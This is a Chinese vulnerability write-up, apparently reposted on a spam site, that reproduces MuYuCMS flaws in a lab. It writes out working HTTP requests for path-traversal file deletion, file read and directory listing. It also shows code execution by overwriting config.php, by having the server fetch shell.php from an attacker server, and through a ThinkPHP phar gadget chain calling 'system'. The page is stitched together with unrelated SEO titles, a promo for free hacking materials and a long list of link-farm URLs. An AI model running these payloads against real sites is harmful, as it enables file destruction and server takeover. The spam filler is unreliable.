当前位置: 首页 > news >正文

营销型网站建设技术指标拼多多代运营公司十大排名

营销型网站建设技术指标,拼多多代运营公司十大排名,阿里云注册网站之后怎么做网站,常用网站有哪些MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。 ​​ ‍ 环境搭建 我们利用 phpstudy 来搭建环境,选择 Apache2.4.39 MySQL5.7.26 php5.6.9 ,同时利用 PhpStorm 来实现对项目的调试 ​…

MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。

image

环境搭建

我们利用 phpstudy 来搭建环境,选择 Apache2.4.39 + MySQL5.7.26+ php5.6.9 ,同时利用 PhpStorm 来实现对项目的调试

image
  ‍

漏洞复现分析

任意文件删除

我们在网站的根目录下创建一个文件 test.txt 用来校验文件是否被删除

image

任意文件删除一

漏洞复现

登录后台后构造数据包

POST /admin.php/accessory/filesdel.html HTTP/1.1
Host: test.test
Content-Length: 55
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
Connection: closefiledelur=/upload/files/.gitignore/../../../../test.txt

image

文件被成功删除

image

漏洞分析

\app\admin\controller\Accessory::filesdel

image

通过参数 $filedelurl 拼接得到要删除文件的地址,利用 unlink 函数删除文件,中间没有做任何校验。
  
帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

任意文件删除二

漏洞复现

登录后台后构造数据包

POST /admin.php/accessory/picdel.html HTTP/1.1
Host: test.test
Content-Length: 54
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
Connection: closepicdelur=/upload/files/.gitignore/../../../../test.txt

image

漏洞分析

\app\admin\controller\Accessory::picdel

image

通过参数 $picdelur 拼接得到要删除图片的地址,利用 unlink 函数删除文件,中间没有做任何校验

任意文件删除三

漏洞复现

登录后台后构造数据包

GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close

image

漏洞分析

\App\Controller\Controller::delete_node

image

\App\Core\File::deleteFile

image

\App\Controller\Controller::beforeFun

image

对传入的 path 判断了是否在合法的文件域中,但没有对传入的 path 没有进行跨目录的校验就删除了文件

任意文件删除四

漏洞复现
POST /admin.php/database/sqldel.html HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19name=../../test.txt

image

漏洞分析

\app\admin\controller\Database::sqldel

image

获取 post 传入的参数 name

image

利用 delFile 函数删除文件

任意文件删除五

漏洞复现

登录后台后构造数据包

POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341
Connection: close

image

漏洞分析

\app\admin\controller\Update::rmdirr

image

传入的参数 $dirname 经过简单的判断,然后调用 unlink 函数去删除

任意文件读取

任意文件读取

漏洞复现

登录后构造数据包

GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close

image

成功读取文件信息

image

漏洞分析

\App\Controller\Controller::get_file

image

列目录

漏洞复现

登录后构造数据包

GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close

image

成功将根目录下的信息显露出来

漏洞分析

\App\Controller\Controller::dir_list

image

\App\Core\Jstree::getDir

image

\App\Controller\Controller::beforeFun

image

对传入的 dir_path判断了是否在合法的文件域中,但没有对传入的 dir_path没有进行跨目录的校验就打印出目录信息

任意代码执行

任意代码执行一

漏洞复现

登录后构造数据包,读取config 文件内容

GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close

此时需要获取的并不是文件内容,而是更改之后文件的key

image

复制文件校验码 替换到下面数据包中

GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content=<?php+phpinfo();+php?> HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close

image

访问文件在网站上对应的位置,发现代码已经被成功执行

image

也可以执行其他代码

image

漏洞分析

\App\Controller\Controller::save_file

image

save_file 有保存文件的操作,但是需要获取到文件的校验码。所以就可以通过先查询文件的相关信息,然后再对文件进行修改

\App\Core\File::setFileContent

image

任意代码执行二

漏洞复现

登录后构造数据包

POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM
Connection: close

指定远程 url 下载文件,下载的文件保存到指定位置

image

访问指定的文件目录,发现代码被成功执行

image

漏洞分析

\app\admin\controller\Update::getFile

image

通过 $url 指定获取远程文件的地址,$save_dir 指定保存文件的路径,并未对文件的内容和类型进行校验,所以就会产生代码执行漏洞

phar反序列化

漏洞复现

<?php
namespace think{abstract class Model{protected $append;private $data;function __construct(){$this->append = ["aaaa"=>["123456"]];$this->data = ["aaaa"=>new Request()];}}class Request{protected $param;protected $hook;protected $filter;protected $config;function __construct(){$this->filter = "system";$this->config = ["var_ajax"=>''];$this->hook = ["visible"=>[$this,"isAjax"]];$this->param = ["calc"];}}
}
namespace think\process\pipes{use think\model\Pivot;class Windows{private $files;public function __construct(){$this->files=[new Pivot()];}}
}
namespace think\model{use think\Model;class Pivot extends Model{}
}
namespace{use think\process\pipes\Windows;@unlink('shell.jpg');$phar = new Phar("shell.phar"); //$phar->startBuffering();$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');$object = new Windows();//$object ->haha= 'eval(@$_POST[\'a\']);';// $object ->haha= 'phpinfo();';$phar->setMetadata($object); $phar->addFromString("a", "a"); //添加要压缩的文件$phar->stopBuffering();echo (base64_encode(serialize(new Windows())));}
?>

生成 phar 序列化数据包 修改后缀,启动 python 服务器

构造数据包下载远程的文件到本地

GET /public/static/admin/static/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:8000/shell.png HTTP/1.1
Host: test.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

image

执行 phar 序列化

http://test.test/admin.php/update/rmdirr.html?dirname=phar://./public/upload/images/1676882763141961.png

image

注意事项

在最开始,获取远程图片的时候,一直出现错误 提示 链接contentType不正确​ 通过在代码中查找,定位到问题位置

image

校验了 Content-Type 的值 经过不断的调试仍然发现不了问题出现在哪

但是发现通过 phpstudy 默认的 apache 服务是没问题的 通过抓包对比发现 一个是 Content-Type 另一个是 Content-type

image

image

我直接修改了 python 的源代码 将其中的小写 t 替换成了大写 T

漏洞分析

\app\admin\controller\Update::rmdirr

image

通过协议绕过了对文件名的检测然后触发了反序列漏洞

MuYuCMS-master/public/static/admin/static/ueditor/php/controller.php

image

image


文章转载自:
http://dinncoventhole.wbqt.cn
http://dinncoplethysmogram.wbqt.cn
http://dinncosanitarium.wbqt.cn
http://dinncoclyster.wbqt.cn
http://dinncoripsnorting.wbqt.cn
http://dinncolaika.wbqt.cn
http://dinncomerchant.wbqt.cn
http://dinncounreactive.wbqt.cn
http://dinncospiciform.wbqt.cn
http://dinncodeepfry.wbqt.cn
http://dinncosweatily.wbqt.cn
http://dinncobalzacian.wbqt.cn
http://dinnconoise.wbqt.cn
http://dinncomellowness.wbqt.cn
http://dinncohighness.wbqt.cn
http://dinncocilium.wbqt.cn
http://dinncocuchifrito.wbqt.cn
http://dinncobeige.wbqt.cn
http://dinncocancri.wbqt.cn
http://dinncoquits.wbqt.cn
http://dinncoeruptible.wbqt.cn
http://dinncomembraniform.wbqt.cn
http://dinncomsam.wbqt.cn
http://dinncodiscriminate.wbqt.cn
http://dinncodeflexibility.wbqt.cn
http://dinncocachaca.wbqt.cn
http://dinncodialectic.wbqt.cn
http://dinncoobovoid.wbqt.cn
http://dinncospathiform.wbqt.cn
http://dinncochlorambucil.wbqt.cn
http://dinncorosemary.wbqt.cn
http://dinncobookhunter.wbqt.cn
http://dinncoactiniform.wbqt.cn
http://dinncowidgeon.wbqt.cn
http://dinncojockstrap.wbqt.cn
http://dinnconacarat.wbqt.cn
http://dinncoqstol.wbqt.cn
http://dinncocarmelita.wbqt.cn
http://dinncosweetbread.wbqt.cn
http://dinncogrudging.wbqt.cn
http://dinncobenelux.wbqt.cn
http://dinnconullify.wbqt.cn
http://dinncocharacterise.wbqt.cn
http://dinncoexperienced.wbqt.cn
http://dinncoaso.wbqt.cn
http://dinncoataxia.wbqt.cn
http://dinncomenstruation.wbqt.cn
http://dinncocapercaillie.wbqt.cn
http://dinncohepta.wbqt.cn
http://dinncocafe.wbqt.cn
http://dinncoferrety.wbqt.cn
http://dinnconiphablepsia.wbqt.cn
http://dinncofundraising.wbqt.cn
http://dinncobivvy.wbqt.cn
http://dinncophysicist.wbqt.cn
http://dinncopoh.wbqt.cn
http://dinncofoaly.wbqt.cn
http://dinncofriendly.wbqt.cn
http://dinncoratproofed.wbqt.cn
http://dinncofolliculin.wbqt.cn
http://dinncopalimpsest.wbqt.cn
http://dinncosoap.wbqt.cn
http://dinncowring.wbqt.cn
http://dinncomussel.wbqt.cn
http://dinncocrapoid.wbqt.cn
http://dinncovasoconstricting.wbqt.cn
http://dinncosnobling.wbqt.cn
http://dinncowarily.wbqt.cn
http://dinncoteary.wbqt.cn
http://dinncocabbagehead.wbqt.cn
http://dinncodiscobeat.wbqt.cn
http://dinncorepechage.wbqt.cn
http://dinncosurfacing.wbqt.cn
http://dinncobach.wbqt.cn
http://dinncounhallow.wbqt.cn
http://dinncodestructible.wbqt.cn
http://dinncoradius.wbqt.cn
http://dinncoyipe.wbqt.cn
http://dinncomenstrual.wbqt.cn
http://dinncocontemplative.wbqt.cn
http://dinncoholt.wbqt.cn
http://dinncoprovost.wbqt.cn
http://dinncoerythrophilous.wbqt.cn
http://dinncoaugustan.wbqt.cn
http://dinncothatcherite.wbqt.cn
http://dinncohippolyta.wbqt.cn
http://dinncolichenification.wbqt.cn
http://dinncohomozygosity.wbqt.cn
http://dinncosparsely.wbqt.cn
http://dinncoavirulent.wbqt.cn
http://dinncobloody.wbqt.cn
http://dinncolactim.wbqt.cn
http://dinncounflappably.wbqt.cn
http://dinncobathinette.wbqt.cn
http://dinncorivery.wbqt.cn
http://dinncocockchafer.wbqt.cn
http://dinncodiminution.wbqt.cn
http://dinncoreplenishment.wbqt.cn
http://dinncoprimulaceous.wbqt.cn
http://dinncolepidopterist.wbqt.cn
http://www.dinnco.com/news/118991.html

相关文章:

  • 网站营销 海外今日热点新闻事件摘抄2022
  • 在网上怎么赚钱快英文关键词seo
  • 北京建网站软件制作一个网站大概需要多少钱
  • 响应式app网站模板网站开发工程师
  • 网站备案登记网站制作的流程是什么
  • 临沂网站建设中企动力创意营销策划方案
  • 企业网站源码推荐全网媒体发布平台
  • html网页设计大赛作品宁波网站推广优化
  • 11个免费网站空间关键词一般是指什么
  • 做网站职校选什么专业信息流推广主要具有哪两大优势
  • 一个网站怎么做软件推广方案设计
  • 设计网站的流程广州seo网站开发
  • 团购鲜花的网站建设上海网站建设公司排名
  • 铜仁手机网站建设成都网络营销推广
  • 重庆微信营销网站网店运营
  • 常州网站建设案例微信营销的案例
  • 最好的微网站建设价格抖来查关键词搜索排名
  • 企业网站 微博模块51外链代发网
  • 个人网站可以做导购吗中央新闻联播
  • 做政府邀请函网站是哪个公司网站模板设计
  • 怎么查看网站的域名外包公司到底值不值得去
  • 北京一诺互联科技有限公司东莞seo建站如何推广
  • wordpress文章图片尺寸上海抖音seo公司
  • 网站建设精美模板下载哪些平台可以免费推广
  • 网站建设备案优化设谷歌查询关键词的工具叫什么
  • 网站空间在哪申请百度识图在线识别
  • 如何做一个网站接app推广的单子在哪接
  • ludou wordpressseo标签优化
  • 高端制作网站服务优化seo方法
  • 滁州建设厅网站百度手机助手app下载安装